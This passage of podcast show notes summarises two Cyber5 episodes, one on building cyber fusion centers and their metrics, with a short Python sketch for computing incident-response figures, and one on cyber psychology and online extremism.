that were put in place, and the decisions that were made by key stakeholders. There are currently no well-defined and accepted frameworks for intelligence programs; most programs combine several existing frameworks, including MITRE ATT&CK, which is specific to information security. Intelligence programs need to proactively alert on threats and risks and quantify the success and failure of the actions taken.
In episode 41 of the Cyber5, we are joined by the Director of Cyber Defense Integration at Thomson Reuters, Cliff Webster. Cliff discusses building and scaling cyber fusion centers and their integral part in reducing risk to all facets of the business. Here are the 5 Topics We Cover in this Episode: Differentiating a Cyber Fusion Center from a Security Operations Team: (01:59-07:16) A cyber fusion center (CFC) is an evolution of the traditional security operations center (SOC). A SOC is mostly focused on reactive activities such as detection and incident response around detected malicious activity, whereas a CFC supplements the reactive detection mission with proactive activities, such as adopting new frameworks and identifying new threats before they hit an enterprise's logs and firewalls, to gain speed in responding. Creating connective tissue through technology and process is a unique function of a CFC. A key function that differentiates a CFC from a SOC is moving data and information between teams and business units in a way that reduces attacker dwell time. Critical security functions that overlap with IT and need to come together are threat intelligence, threat hunting, vulnerability management, asset inventory, and red teaming. Going Beyond Cyber Threat Intelligence: (07:16-09:03) A SOC is generally focused on threats against the confidentiality, integrity, and availability of data, systems, and networks. A CFC typically evolves with the same focus initially. However, over time, with the processes and technologies in place, a CFC can tackle other security challenges such as third party risk and elements of physical security, because success will inevitably require integrating other data sources such as questionnaire information and entry/exit badging. Critical Elements That Need to be in Place from a SOC: (09:03-14:20) The core capabilities that need to be in place for a SOC to make the evolution to a CFC are the following: 1) threat intelligence, the engine of a successful cyber fusion center, which can drive priorities in vulnerability management, red teaming, application security, and even larger business-unit product security; 2) a SOC with a SIEM to do basic log aggregation; and 3) a threat hunting team that can identify and correlate hypotheses from threat intelligence or the red team, which usually requires significant investment in technology and the security stack to tailor hunts to threat actor behavior. Critical internal data and log sources are: 1) user access logs, 2) server logs, 3) endpoint and EDR logs, 4) threat intelligence feeds, 5) firewall logs, 6) VPN logs, 7) internal netflow, 8) application logs, and 9) PCAP, if available. A critical element of strategic growth plans within a CFC is the ability to acquire all these datasets and correlate them in a SIEM in a meaningful manner that gives actionable alerts when there is a problem. Support from the Business Units and External Threat Hunting: (14:20-27:30) Engaging with the business units is a critical part of a data acquisition strategy, not only for appropriate log aggregation and correlation but also to work through outputs from the CFC when a security event occurs. With regard to external threat hunting, there is no shortage of external telemetry that can be collected, but this should be prioritized only after an organization knows its own internal environment.
Third party risk management is a fundamental intelligence problem many enterprises are grappling with, due to the challenges of monitoring key vendors at any kind of scale with any consistency. Important Metrics for Cyber Fusion Centers: (27:30-37:00) Mature security teams aspire to be data-driven organizations, and thus metrics are critical to capture (a sketch of computing such metrics follows this episode summary): 1) from an intelligence perspective, baselines of what can be detected, recorded as metrics, in addition to identified gaps; 2) intelligence leading to an accelerated patching cycle that closed visibility gaps; 3) intelligence informing security architecture decisions that led to policy changes, such as removing a remote access tool, measured by the reduction in time a gap was visible; 4) the number of intelligence products that helped the organization understand an initial security incident; and 5) intelligence tippers that led to the discovery of a security event.
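As a rough illustration of turning those items into numbers, here is a minimal Python sketch that computes a mean time to contain and counts intelligence-tipped detections from incident records. The record layout (ISO timestamps and a "source" field) is an assumption for illustration, not Thomson Reuters' tooling.

```python
# Minimal sketch: compute two fusion-center metrics from a list of incident records.
from datetime import datetime
from statistics import mean

INCIDENTS = [
    {"detected": "2021-03-01T08:00:00", "contained": "2021-03-01T14:30:00", "source": "intel_tipper"},
    {"detected": "2021-03-05T09:15:00", "contained": "2021-03-06T10:00:00", "source": "siem_alert"},
    {"detected": "2021-03-09T11:00:00", "contained": "2021-03-09T12:45:00", "source": "intel_tipper"},
]

def hours_between(start: str, end: str) -> float:
    """Elapsed hours between two ISO-format timestamps."""
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 3600

if __name__ == "__main__":
    mean_time_to_contain = mean(hours_between(i["detected"], i["contained"]) for i in INCIDENTS)
    intel_tipped = sum(1 for i in INCIDENTS if i["source"] == "intel_tipper")
    print(f"Mean time to contain: {mean_time_to_contain:.1f} hours")
    print(f"Incidents discovered via intelligence tippers: {intel_tipped} of {len(INCIDENTS)}")
```

Tracking these numbers over time is what lets a fusion center demonstrate that intelligence is actually reducing dwell time rather than just producing reports.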
In episode 40 of the Cyber5, we are joined by Mary Aiken, Professor of Cyber Psychology and former producer of CSI: Cyber. Mary discusses the psychology of online behavior, particularly with regard to social media, and how it can play a critical role in leading people to extremist ideology. Here are the 5 Topics We Cover in this Episode: Defining Cyber Psychology as it Relates to Cyberspace: (01:00-05:52) Cyber psychology is the study of the impact of technology on human behavior. We maintain that human behavior can fundamentally change or mutate in a cyber context. Key constructs include the Online Disinhibition Effect (ODE), which holds that people will perform actions in a cyber context that they would not normally perform in the real world. In addition, anonymity is a powerful psychological driver online, and while some argue that online anonymity is a fundamental right, that is not accurate; it's an invention of the internet, and behavior is evolving at the speed of technology. Defining Cyberspace for the Corporate Enterprise: (05:24-09:52) In 2016, NATO ratified cyberspace as an operational domain, acknowledging that the battles of the future will take place on land, sea, air, and computer networks. In addition to thinking about how the military fights these future battles, it's also important for enterprises to understand how their businesses and employees operate online and address various threat actors. Psychology Evolving as Extremism Transitions Online: (09:52-12:00) People are prone to write more adversarial thoughts online because they are not receiving the same micro-expressions, body language, proximity, and feedback they would receive in person. Mary feels addiction does not apply to technology because we rely on it just as we rely on air or water; however, we have to play catch-up as a society on how to recognize and curb aggressive online behavior. Online Safety Technology: (12:00-16:00) While a lot of threat intelligence is geared toward the confidentiality, integrity, and availability (C.I.A.) of data, systems, and networks, it does not focus on what it means to be human. Many in the business community, including Paladin Capital, are starting to invest in safety technologies and services that address both the C.I.A. of data systems and the behavioral aspects of cyber security, such as insider threat, harassment, cyber bullying, and disinformation, to deliver holistic security capabilities. Extremist Behavior Online Filtering into Violence in the Real World: (16:00-21:00) When people are constantly circulating in echo chambers online, fueled by false information and hate speech, combined with ODE, there is huge potential for violence in the real world, as displayed during the Capitol Hill riots in 2021. It's going to be critical for enterprises to monitor cyberspace from a brand reputation perspective, and not just for negative sentiment against products and services. It will also be critical to understand sentiment around employee behavior to ensure it is not detrimental to the brand's image.